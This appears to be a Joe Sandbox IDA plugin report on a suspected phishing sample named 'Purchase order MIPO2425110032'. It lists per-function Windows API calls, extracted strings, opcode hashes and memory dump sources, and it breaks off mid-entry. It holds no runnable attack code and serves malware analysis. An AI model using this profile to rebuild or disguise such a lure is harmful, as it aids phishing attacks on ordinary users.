                                                            • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                            • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                            • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                            • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00464B28
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                            • _wcslen.LIBCMT ref: 00464C28
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                            • _wcslen.LIBCMT ref: 00464CBA
                                                            • _wcslen.LIBCMT ref: 00464CD0
                                                            • _wcslen.LIBCMT ref: 00464CEF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Directory$CurrentSystem
                                                            • String ID: D
                                                            • API String ID: 1914653954-2746444292
                                                            • Opcode ID: 26a6354b50ed1ae2b8913909961c1f7dd70ed5f9c5f73d3f7e6f3274403e8c7a
                                                            • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                            • Opcode Fuzzy Hash: 26a6354b50ed1ae2b8913909961c1f7dd70ed5f9c5f73d3f7e6f3274403e8c7a
                                                            • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                            APIs
                                                            • _wcsncpy.LIBCMT ref: 0045CE39
                                                            • __wsplitpath.LIBCMT ref: 0045CE78
                                                            • _wcscat.LIBCMT ref: 0045CE8B
                                                            • _wcscat.LIBCMT ref: 0045CE9E
                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                            • _wcscpy.LIBCMT ref: 0045CF61
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                            • String ID: *.*
                                                            • API String ID: 1153243558-438819550
                                                            • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                            • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                            • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                            • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll
                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                            • API String ID: 3832890014-4202584635
                                                            • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                            • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                            • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                            • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                            APIs
                                                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                            • GetFocus.USER32 ref: 0046A0DD
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$CtrlFocus
                                                            • String ID: 0
                                                            • API String ID: 1534620443-4108050209
                                                            • Opcode ID: 00e055a549b125ddc5fd2d23f7dd8ed6e9150fbff2d0b75d7232e964713a8e5e
                                                            • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                            • Opcode Fuzzy Hash: 00e055a549b125ddc5fd2d23f7dd8ed6e9150fbff2d0b75d7232e964713a8e5e
                                                            • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                            APIs
                                                            • DestroyWindow.USER32(?), ref: 004558E3
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateDestroy
                                                            • String ID: ,$tooltips_class32
                                                            • API String ID: 1109047481-3856767331
                                                            • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                            • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                            • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                            • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                            • GetMenuItemCount.USER32(?), ref: 00468C45
                                                            • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                            • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                            • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                            • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                            • GetMenuItemCount.USER32 ref: 00468CFD
                                                            • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                            • GetCursorPos.USER32(?), ref: 00468D3F
                                                            • SetForegroundWindow.USER32(?), ref: 00468D49
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                            • String ID: 0
                                                            • API String ID: 1441871840-4108050209
                                                            • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                            • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                            • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                            • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                            • __swprintf.LIBCMT ref: 00460915
                                                            • __swprintf.LIBCMT ref: 0046092D
                                                            • _wprintf.LIBCMT ref: 004609E1
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 3631882475-2268648507
                                                            • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                            • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                            • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                            • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                            APIs
                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                            • SendMessageW.USER32 ref: 00471740
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                            • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                            • SendMessageW.USER32 ref: 0047184F
                                                            • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                            • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                            • String ID:
                                                            • API String ID: 4116747274-0
                                                            • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                            • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                            • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                            • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                            • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu$Sleep
                                                            • String ID: 0
                                                            • API String ID: 1196289194-4108050209
                                                            • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                            • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                            • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                            • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0043143E
                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                            • SelectObject.GDI32(00000000,?), ref: 00431466
                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                            • String ID: (
                                                            • API String ID: 3300687185-3887548279
                                                            • Opcode ID: c041ec31f77b2f21b2023a958713647570c0122b596f6872da4d7c13e5ecc15f
                                                            • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                            • Opcode Fuzzy Hash: c041ec31f77b2f21b2023a958713647570c0122b596f6872da4d7c13e5ecc15f
                                                            • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                            APIs
                                                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                            • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 1976180769-4113822522
                                                            • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                            • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                            • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                            • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                            • String ID:
                                                            • API String ID: 461458858-0
                                                            • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                            • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                            • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                            • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                            • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                            • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                            • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                            • DeleteObject.GDI32(?), ref: 004301D0
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
